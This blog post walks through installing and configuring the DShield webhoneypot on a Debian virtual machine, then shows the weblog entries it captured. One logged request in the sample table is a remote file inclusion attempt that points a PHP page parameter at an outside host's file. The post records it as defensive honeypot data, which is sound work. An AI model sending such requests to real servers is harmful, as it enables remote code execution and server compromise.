Webhoneypot fun
37 days ago the DShield webhoneypot project released the first Alpha of the code. I hadn't really had much time to play with it yet, but one of our readers had a challenge with his submissions, so I figured I'd better get my hands dirty. Another reason is that there does seem to be a lot of malicious web traffic around at the moment and I wanted to grab some of it.
So here is a quick run down of my webhoneypot experience.
Firstly I logged into DShield and under "My Information" I entered the Honeypot URL and ticked the "Honeypot is Active" button.
Next to grab the code. The code is hosted on Google and can be obtained here The site has install information and several releases are available, the raw code, a debian package and a Mac OS X package. Looking at the install instructions I decided to go with the debian package. (Now before you chuckle it was because I only had about 15 minutes or so to get it done and like many time poor people I like shortcuts. It was not because the install instructions are not good. In fact quite the opposite.)
So I built a new Debian 5 VM on a virtualbox which was straight forward. I only installed a very minimal system with Apache, and PHP5 About 10 minutes gone.
After grabbing the deb file I installed it using the "Installation with a Debian Package" instructions, which took about 3 seconds or so. It asks you what port number you would like to use, sets up the relevant start jobs etc. In short it does pretty much everything for you. Once you have completed this step you have a honeypot running on the machine and all you need to do is change the /opt/webhoneypot/etc/config.local file and enter your DShield userid (which will be your email address) and password in the file (the userid=yourdshieldemailaddress and password=thepasswordfortheuserid do not use " )
The final step after this is was to open a browser and go to the web page. When you hit the page you will get a message along the lines of "Check logfile for hashpassword". This basically verifies that you have successfully connected to DShield. You replace the password=thepasswordfortheuserid line with the hashpassword=738abc..... parameter from the log file and you are good to go.
Revisit the web page with, for example, a robots.txt request and you will get a response. When you look in the log file /opt/webhoneypot/logs/honey.... file you will see an entry along the lines of timestamp IP-Address Delivered Template 123 . If you see that, the log line was delivered (123 is just an example you will see different numbers).
Log into DShield again and under the "My Weblogs" tag you should see your test log entries. For example:
Time |
URL |
Source |
Target |
11:11:33 |
GET /robots.txt HTTP/1.1 |
192.168.22.10 |
202.999.999.24 |
11:14:29 |
GET /robots.txt HTTP/1.1 |
192.168.22.10 |
202.999.999.24 |
11:12:36 |
GET /i.php?page=http://204.2.183.2/babycaleb/picture.htm? HTTP/1.1 |
192.168.22.10 |
202.999.999.24 |
Total time taken, twenty minutes. Ten minutes to install an OS onto the VM and five minutes or so because I borked my VM's network connection. A final five minutes to install and configure the Honeypot.
The guys on the team have done a great job. If you have a spare IP this is a great way to contribute. Give it a go.
Mark H - Shearwater
For those of you that are students and think Honeypots might be something you are interested in, then check out the Honeynet Project Google Summer of Code page http://www.honeynet.org/gsoc .
Comments
Dan
Mar 27th 2009
1 decade ago